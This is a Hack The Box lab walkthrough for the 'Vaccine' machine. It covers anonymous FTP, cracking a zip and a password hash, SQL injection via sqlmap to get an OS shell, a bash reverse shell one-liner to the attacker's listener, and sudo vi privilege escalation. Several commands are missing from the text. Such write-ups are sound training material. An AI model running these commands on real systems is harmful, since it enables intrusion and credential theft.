As usual let's start with nmap:
nmap -sV -sC IP
Replace IP by the IP of your target machine (Vaccine)
The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.
We can see that port 21 which is associated with FTP is open and that Anonymous FTP login is allowed so let's try that.
When prompted for a username, type anonymous and press enter
You will now be prompted to enter the password
For the password just press enter.
We have now successfully login using anonymous as the username and with no password!
We can see that there is a file called backup.zip. Let's try to download it to our VM using:
The zip file should now be saved on your VM. Just go to your home directory
We collected what we needed so we can now exit the ftp session by typing:
Let's now open a new command prompt window and type:
Let's now try to unzip the zip file by typing:
It is asking for a password to unzip the file. Just press enter
We do not have the password, but let's use John The Ripper to crack it.
If you are not familiar with John The Ripper, or if you need a quick refresher, check out my short post on the basics before continuing.
zip2john backup.zip > hash.txt
john --wordlist=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt hash.txt
john --show hash.txt
We cracked the password! The password is 741852963
Now let's try to unzip it again.
Type in the password:
and press enter
The zip file had 2 files into it:
index.php and style.css
Let's check them out:
Looks like we found some credentials! Username admin and its password hash
We can use Crackstation at to find out the password:
- Go to https://crackstation.net/
- Copy the hash we just found 2cb42f8734ea607eefed3b70af13bbd3
- Paste it into the password hash cracker
- Tick I'm not a robot
- Click on Crack Hashes
We cracked the password!
The password is qwerty789
When we ran our nmap earlier, we also found that port 80 was opened which is associated with HTTP. So let's open a new browser window from our VM to check it out by typing in the url bar:
We are asked for some credentials to login. We just found the following credentials so let's try that:
and click on Sign In
We are in!
The website holds a Car Catalogue. Note the url is http://10.129.247.166/dashboard.php
Now let's try to look for a specific car name. In the search field, type the word Sandy for instance and press enter.
We can now see the url changed to http://10.129.247.166/dashboard.php?search=sandy
We can test it out with a few different search but looks like there is a query that uses
?search= followed by whatever we typed in in the search bar
This might be connected with a database... Let's use sqlmap to see if it is vulnerable to SQL injections.
First let's find the cookie session.
To do that right click on the page and select Inspect Element
Now click on the tab Storage
The PHPSESSID should be displayed as per below:
Note that your PHPSESSID will be different that mine.
If you are not familiar with sqlmap or if you need a quick refresher, check out my short post on the sqlmap basics before continuing with this machine.
Let's use our sqlmap:
sqlmap --url="http://10.129.247.166/dashboard.php?search=sandy" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shell
We got the shell!
Now open a brand new command prompt window and type:
nc -lnvp 4444
Now, return to your sqlmap shell and type:
bash -c "bash -i >& /dev/tcp/10.10.14.35/4444 0>&1"
The IP 10.10.14.35 is the IP of your Virtual Machine. Your IP will be different than mine. If you don't know the IP of your VM, open a new command prompt window and type ifconfig
Just press enter
Now let's return to our netcat and we should have a session!
We got the shell! Now let's make the shell stable using:
python3 -c 'import pty;pty.spawn("/bin/bash")'
You got the flag!
As usual with privilege escalation, let's start with:
It is asking us for the password and we don't have it
Let's try to find the password in the directory /var/www/html
Let's check out dashboard.php
cat dashboard.php | grep password
We found the password for user posgres
We can keep trying from here but the shell might die soon so let's use the credentials we found to ssh into it directly.
Let's open a new command prompt window. We know from the nmap scan at the beginning that port 22 is open which is associated with ssh. And we now have the credentials for user posgres!
10.129.247.166 is the IP of the target machine. The IP of the target machine changes all the time so yours will be different.
We are now prompted to enter the password for username postgress.
The password is:
We are in!
We can find user.txt file here too
Enter the password again
So it seems like we are able to edit pg_hba.conf using vi text editor. Let's now type:
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
We can escalate our privilege using the following command:
Now we get the shell!
Congratulations! You got the root flag!